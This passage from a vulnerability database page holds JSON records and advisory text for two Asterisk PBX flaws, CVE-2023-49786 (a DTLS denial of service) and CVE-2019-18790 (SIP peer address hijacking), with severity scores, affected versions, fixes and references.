      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Debian",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2023-49786",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.2,
            "id": "CVE-2023-49786",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security-advisories@github.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2023-49786",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 5.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2023-49786",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2023-49786",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "security-advisories@github.com",
            "id": "CVE-2023-49786",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2023-49786",
            "trust": 0.8,
            "value": "Medium"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n    The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n    the available buffer space for storing the new value of a header. By doing\n    so this can overwrite memory or cause a crash. This is not externally\n    exploitable, unless dialplan is explicitly written to update a header based\n    on data from an outside source. If the \u0027update\u0027 functionality is not used\n    the vulnerability does not occur. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49294\n\n    It is possible to read any arbitrary file even when the `live_dangerously`\n    option is not enabled. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-49786",
        "trust": 2.7
      },
      {
        "db": "PACKETSTORM",
        "id": "176251",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2023/12/15/7",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "176383",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "id": "VAR-202312-0487",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.75
  },
  "last_update_date": "2024-08-14T14:30:07.981000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-703",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-362",
        "trust": 1.0
      },
      {
        "problemtype": "Race condition (CWE-362) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "http://packetstormsecurity.com/files/176251/asterisk-20.1.0-denial-of-service.html"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2023/dec/24"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/enablesecurity/advisories/tree/master/es2023-01-asterisk-dtls-hello-race"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-hxj9-xwr8-w8pq"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/asterisk"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-31T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "date": "2024-01-05T14:31:02",
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "date": "2023-12-14T20:15:52.927000",
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-31T06:13:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "date": "2023-12-29T00:15:50.043000",
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Vulnerabilities related to race conditions in products from multiple vendors such as",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      }
    ],
    "trust": 0.8
  }
}

var-201911-0701

Vulnerability from variot

An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.
Nature of Advisory Denial of Service
Susceptibility Remote Unauthenticated Sessions
Severity Minor
Exploits Known No
Reported On October 17, 2019
Reported By Andrey V. T.
Modules Affected channels/chan_sip.c

Resolution  Using any other option value for “nat” will prevent the       
            attack (such as “nat=no” or “nat=force_rport”), but will      
            need to be tested on an individual basis to ensure that it    
            works for the user’s deployment. On the fixed versions of     
            Asterisk, it will no longer set the address of the peer       
            before authentication is successful when a SIP request comes  
            in.

                           Affected Versions       
                     Product                       Release  
                                                   Series   
              Asterisk Open Source                  13.x    All releases  
              Asterisk Open Source                  16.x    All releases  
              Asterisk Open Source                  17.x    All releases  
               Certified Asterisk                   13.21   All releases

                              Corrected In                   
                          Product                              Release    
                   Asterisk Open Source                        13.29.2    
                   Asterisk Open Source                        16.6.2     
                   Asterisk Open Source                        17.0.1     
                    Certified Asterisk                       13.21-cert5

                                 Patches                         
                           SVN URL                                Revision

http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13 http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16 http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17 http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified
Asterisk
13.21-cert5

Links  https://issues.asterisk.org/jira/browse/ASTERISK-28589

Asterisk Project Security Advisories are posted at                        
http://www.asterisk.org/security

This document may be superseded by later versions; if so, the latest      
version will be posted at                                                 
http://downloads.digium.com/pub/security/AST-2019-006.pdf and             
http://downloads.digium.com/pub/security/AST-2019-006.html

                            Revision History
      Date          Editor                 Revisions Made                 
October 22, 2019   Ben Ford  Initial Revision                             
November 14, 2019  Ben Ford  Corrected and updated fields for             
                             versioning, and added CVE                    
November 21, 2019  Ben Ford  Added “Posted On” date

           Asterisk Project Security Advisory - AST-2019-006
           Copyright © 2019 Digium, Inc. All Rights Reserved.

Permission is hereby granted to distribute and publish this advisory in its original, unaltered form

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-0701",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.29.2"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.21.0"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "16.0.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "16.6.2"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "17.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "13.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "17.0.1"
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "13.x"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "16.x"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "17.x"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "13.21"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=13.*"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=16.*"
      },
      {
        "model": "asterisk",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "\u003c=17.*"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "sangoma",
        "version": "13.21"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:debian:debian_linux",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:asterisk",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:certified_asterisk",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "bford",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155434"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-18790",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2019-18790",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2020-03059",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-18790",
            "impactScore": 2.5,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2019-18790",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-18790",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-18790",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-03059",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1291",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1291"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.         \n    Nature of Advisory  Denial of Service                                     \n      Susceptibility    Remote Unauthenticated Sessions                       \n         Severity       Minor                                                 \n      Exploits Known    No                                                    \n       Reported On      October 17, 2019                                      \n       Reported By      Andrey V. T.                                     \n    Modules Affected  channels/chan_sip.c                                     \n\n    Resolution  Using any other option value for \u201cnat\u201d will prevent the       \n                attack (such as \u201cnat=no\u201d or \u201cnat=force_rport\u201d), but will      \n                need to be tested on an individual basis to ensure that it    \n                works for the user\u2019s deployment. On the fixed versions of     \n                Asterisk, it will no longer set the address of the peer       \n                before authentication is successful when a SIP request comes  \n                in.                                                           \n\n                               Affected Versions       \n                         Product                       Release  \n                                                       Series   \n                  Asterisk Open Source                  13.x    All releases  \n                  Asterisk Open Source                  16.x    All releases  \n                  Asterisk Open Source                  17.x    All releases  \n                   Certified Asterisk                   13.21   All releases  \n\n                                  Corrected In                   \n                              Product                              Release    \n                       Asterisk Open Source                        13.29.2    \n                       Asterisk Open Source                        16.6.2     \n                       Asterisk Open Source                        17.0.1     \n                        Certified Asterisk                       13.21-cert5  \n\n                                     Patches                         \n                               SVN URL                                Revision   \n  http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff    Asterisk 13 \n  http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff    Asterisk 16 \n  http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff    Asterisk 17 \n  http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified   \n                                                                     Asterisk    \n                                                                     13.21-cert5 \n\n    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28589             \n\n    Asterisk Project Security Advisories are posted at                        \n    http://www.asterisk.org/security                                          \n                                                                              \n    This document may be superseded by later versions; if so, the latest      \n    version will be posted at                                                 \n    http://downloads.digium.com/pub/security/AST-2019-006.pdf and             \n    http://downloads.digium.com/pub/security/AST-2019-006.html                \n\n                                Revision History\n          Date          Editor                 Revisions Made                 \n    October 22, 2019   Ben Ford  Initial Revision                             \n    November 14, 2019  Ben Ford  Corrected and updated fields for             \n                                 versioning, and added CVE                    \n    November 21, 2019  Ben Ford  Added \u201cPosted On\u201d date                       \n\n               Asterisk Project Security Advisory - AST-2019-006\n               Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-18790"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-03059"
      },
      {
        "db": "PACKETSTORM",
        "id": "155434"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-18790",
        "trust": 3.1
      },
      {
        "db": "DLINK",
        "id": "SAP10005",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012588",
